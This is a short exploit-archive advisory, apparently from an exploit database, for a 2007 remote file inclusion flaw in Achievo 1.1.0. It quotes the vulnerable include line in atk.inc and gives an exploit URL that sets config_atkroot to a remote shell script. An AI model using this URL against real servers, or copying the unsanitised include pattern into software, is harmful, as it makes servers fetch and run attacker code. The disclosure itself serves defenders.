Achievo 1.1.0 (atk.inc config_atkroot) Remote File Inclusion Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Achievo 1.1.0 (atk.inc config_atkroot) Remote File Inclusion Vulnerability
# Published : 2007-05-15
# Author : Katatafish
# Previous Title : FAQEngine <= 4.16.03 (question.php questionref) SQL Injection Exploit
# Next Title : XOOPS Module resmanager <= 1.21 BLIND SQL Injection Exploit

## Achievo 1.1.0(index.php) Remote File Include Vulnerability ##

#Found by : Katatafish (karatatata@hush.com)

#Download http://www.achievo.org/files/achievo-stable-1.1.0.tar.gz

# File: ./atk.inc
 include_once($config_atkroot."atk/modules/class.atkmodule.inc");

# Exploit http://site.com/[path]/index.php?config_atkroot=SHELL

# www.Syue.com [2007-05-15]